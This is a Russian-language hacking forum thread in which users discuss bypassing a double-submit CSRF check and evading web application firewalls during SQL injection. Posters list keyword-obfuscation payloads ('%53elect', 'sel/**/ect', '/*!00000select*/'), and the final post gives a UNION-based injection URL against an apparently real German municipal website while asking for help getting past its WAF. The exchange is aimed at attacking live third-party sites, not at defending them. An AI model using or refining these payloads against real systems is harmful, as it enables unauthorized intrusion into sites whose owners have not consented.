HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Уязвимости
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 24.12.2019, 12:05
Octavian
Постоянный
Регистрация: 08.07.2015
Сообщений: 501
С нами: 5710646

Репутация: 24


По умолчанию

Цитата:
Сообщение от Pop-Xlop  

А что собственно непонятно? В данном случае CSRF токен сверял идентичность параметров в заголовке и в куках, если одинаково - значит всё как надо. Классика идёт ещё со времен "защитных" капч. Уважаю таких разработчиков.
Счастливой охоты на жуков.
Да, это понятно но как эксплуатируется такое? злоумышленник не знает что у жертвы в куках чтоб провесть CSRF
 
Ответить с цитированием

  #2  
Старый 27.12.2019, 00:18
Octavian
Постоянный
Регистрация: 08.07.2015
Сообщений: 501
С нами: 5710646

Репутация: 24


По умолчанию

Цитата:
Сообщение от Octavian  

Привет, подскажите что за обход тут
https://medium.com/@sainttobs/csrf-t...g-ff7f51166ea1
Подскажете как такое эксплуатируется?
 
Ответить с цитированием

  #3  
Старый 27.12.2019, 01:46
ShpillyWilly
Познающий
Регистрация: 27.09.2012
Сообщений: 71
С нами: 7170806

Репутация: 0
По умолчанию

Цитата:
Сообщение от Octavian  

Подскажете как такое эксплуатируется?
ну тут все просто, тут не проверялось что именно за токен он отправляет, проверялось, что 2 токена совпадают, поэтому он просто одно и то же написал в куки и хедер, собственно все, проверка на CSRF пройдена.
 
Ответить с цитированием

  #4  
Старый 21.01.2020, 20:23
Prous
Новичок
Регистрация: 10.05.2018
Сообщений: 3
С нами: 4217366

Репутация: 0
По умолчанию

Здравствуйте! Есть boolean blind sql иньекция,но WAF фильрует select и information_schema. Удалось вытащить версию mysql - 5.5.42

Пробовал обходить(аналогично с information_schema):

%53elect

sel/**/ect

SeLEcT

sel+ect

concat('sel', 'ect')

URL encode тоже пробовал,но результата нет. Есть какие нибудь идеи?
 
Ответить с цитированием

  #5  
Старый 21.01.2020, 20:26
erwerr2321
Флудер
Регистрация: 19.06.2015
Сообщений: 4,126
С нами: 5738006

Репутация: 147


По умолчанию

/*!00000select*/

тут есть варианты

/threads/425295/
 
Ответить с цитированием

  #6  
Старый 21.01.2020, 21:06
Prous
Новичок
Регистрация: 10.05.2018
Сообщений: 3
С нами: 4217366

Репутация: 0
По умолчанию

Цитата:
Сообщение от ms13  

/*!00000select*/
тут есть варианты
/threads/425295/
не работает. waf не modsecurity,другой самопис

фильтр похоже по маске ищет select в запросе

т.е даже так sdbdnbpselect не работает
 
Ответить с цитированием

  #7  
Старый 21.01.2020, 21:31
erwerr2321
Флудер
Регистрация: 19.06.2015
Сообщений: 4,126
С нами: 5738006

Репутация: 147


По умолчанию

ну прости, я ж не знал, шо всё так...
 
Ответить с цитированием

  #8  
Старый 21.01.2020, 21:35
Prous
Новичок
Регистрация: 10.05.2018
Сообщений: 3
С нами: 4217366

Репутация: 0
По умолчанию

по хедеру узнал что waf akamai
 
Ответить с цитированием

  #9  
Старый 22.01.2020, 01:09
BabaDook
Познавший АНТИЧАТ
Регистрация: 09.05.2015
Сообщений: 1,066
С нами: 5797046

Репутация: 40


По умолчанию

Цитата:
Сообщение от Prous  

по хедеру узнал что waf akamai
Молодец
 
Ответить с цитированием

  #10  
Старый 23.01.2020, 13:19
DezMond™
Участник форума
Регистрация: 10.01.2008
Сообщений: 199
С нами: 9650336

Репутация: 662
По умолчанию

помогите ваф обойти

Код:
http://baustelle.viernheim.de/index.php?id=83&rt=single&typ=img&no_cache=1&uid=10+union+1,2,3,4,5,6,7,8,9,10,11,12,13,14+--+
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.